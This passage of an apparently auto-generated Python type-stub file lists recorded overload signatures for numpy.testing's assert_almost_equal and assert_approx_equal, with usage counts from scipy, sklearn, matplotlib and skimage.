decimal: int,
err_msg: Literal["N regression"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[complex]):
"""
usage.scipy: 5
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[complex, int]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[int, complex]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[int, complex, float]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[complex, float]], decimal: int
):
"""
usage.scipy: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[complex], decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[numpy.complex128], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.matrix, desired: numpy.matrix):
"""
usage.scipy: 7
"""
...
@overload
def assert_almost_equal(actual: numpy.matrix, desired: numpy.ndarray):
"""
usage.scipy: 7
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.matrix):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["2 ; 3 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; 8 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; -2 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["array(-1) ; -2 ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: int, err_msg: Literal["-1 ; array(-2) ; 1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: int, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, decimal: int):
"""
usage.scipy: 31
usage.sklearn: 5
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 7
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.complex128, desired: numpy.complex128, decimal: int
):
"""
usage.scipy: 14
"""
...
@overload
def assert_almost_equal(actual: numpy.complex128, desired: complex):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #3"]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["test #8"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #9"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #10"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #11"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #12"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #13"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #14"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #15"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #0"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #1"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #2"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #4"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #5"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #6"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, err_msg: Literal["test #7"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 1
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(0)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.chebyu(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(0)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(1)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(1)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(2)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(2)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(3)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(3)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.laguerre(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.hermite(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.hermitenorm(4)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyt(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyu(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebyc(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.chebys(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyt(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.sh_chebyu(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, err_msg: Literal["orth.legendre(4)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
err_msg: Literal["orth.sh_legendre(4)"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[float], decimal: int, err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.float64, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["alpha - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: List[numpy.float64], decimal: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["argus - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["beta - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[numpy.float64], decimal: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["burr - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["chi - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["chi2 - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["expon - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[float],
decimal: int,
err_msg: Literal["f - sf-isf roundtrip"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["f - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["fisk - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["gamma - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["levy - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["lomax - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["moyal - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["ncf - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["nct - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["ncx2 - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["norm - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["rdist - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["rice - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[float],
decimal: int,
err_msg: Literal["t - sf-isf roundtrip"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["t - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["trapz - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: List[numpy.float64],
decimal: int,
err_msg: Literal["wald - ppf multiple"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["binom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["binom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["binom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["boltzmann - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float, desired: numpy.ndarray, decimal: int, err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["dlaplace - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["geom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["geom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["geom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["nbinom - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["nbinom - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["nbinom - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["planck - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["planck - 2ndt moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["planck - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: float,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["poisson - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["poisson - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["randint - 1st moment"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["randint - skew"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["quadrature"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
decimal: int,
err_msg: Literal["zolotarev"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[int, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[int, float, int, int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: int, decimal: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: float,
decimal: int,
err_msg: Literal["test_540_567"],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
decimal: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, int]],
decimal: int,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(actual: int, desired: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: List[List[float]], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ma.core.MaskedArray, desired: List[float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: List[float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray
):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64, desired: float, decimal: int, verbose: bool
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, decimal: int, verbose: bool):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.stats.SpearmanrResult,
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.stats.SpearmanrResult,
desired: scipy.stats.mstats_basic.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: List[float], desired: List[float], decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: List[Union[numpy.float64, float]], desired: List[float], decimal: int
):
"""
usage.scipy: 8
"""
...
@overload
def assert_almost_equal(
actual: List[numpy.float64], desired: List[float], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: List[numpy.float64], desired: numpy.ndarray, decimal: int
):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(
actual: scipy.stats.mstats_basic.KruskalResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: numpy.ndarray):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_almost_equal(actual: list, desired: numpy.ndarray):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: Tuple[float, float], desired: Tuple[int, int]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: List[float]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_almost_equal(actual: List[float], desired: numpy.ndarray):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_almost_equal(
actual: numpy.float64,
desired: numpy.float64,
decimal: int,
err_msg: Literal["Unexpected std"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: int, desired: numpy.float64):
"""
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.int64, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str):
"""
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: float, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[float, int]]):
"""
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int], err_msg: str):
"""
usage.sklearn: 3
"""
...
# Catch-all signature for all recorded overloads above.
# NOTE: keyword order fixed to match numpy.testing.assert_almost_equal's
# documented signature -- (actual, desired, decimal=7, err_msg='', verbose=True).
# The previous order (decimal, verbose, err_msg) would type-check a positional
# call like assert_almost_equal(a, b, 7, "message") with the message bound to
# `verbose`, contradicting the many recorded (actual, desired, decimal, err_msg)
# overloads above.
def assert_almost_equal(
    actual: object,
    desired: object,
    decimal: int = ...,
    err_msg: str = ...,
    verbose: bool = ...,
):
    """
    usage.matplotlib: 50
    usage.scipy: 1344
    usage.skimage: 333
    usage.sklearn: 965
    """
    ...
@overload
def assert_approx_equal(actual: numpy.float64, desired: float, significant: int):
"""
usage.scipy: 61
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: float):
"""
usage.matplotlib: 1
usage.scipy: 87
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.scipy: 10
usage.sklearn: 1
"""
...
@overload
def assert_approx_equal(actual: numpy.float64, desired: int):
"""
usage.scipy: 2
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64, desired: numpy.float64, significant: int
):
"""
usage.scipy: 13
usage.sklearn: 1
"""
...
@overload
def assert_approx_equal(actual: float, desired: float):
"""
usage.scipy: 25
"""
...
@overload
def assert_approx_equal(actual: float, desired: float, significant: int):
"""
usage.scipy: 6
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.100000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
actual: numpy.float64,
desired: float,
significant: int,
err_msg: Literal["fail forp=0.125000"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_approx_equal(
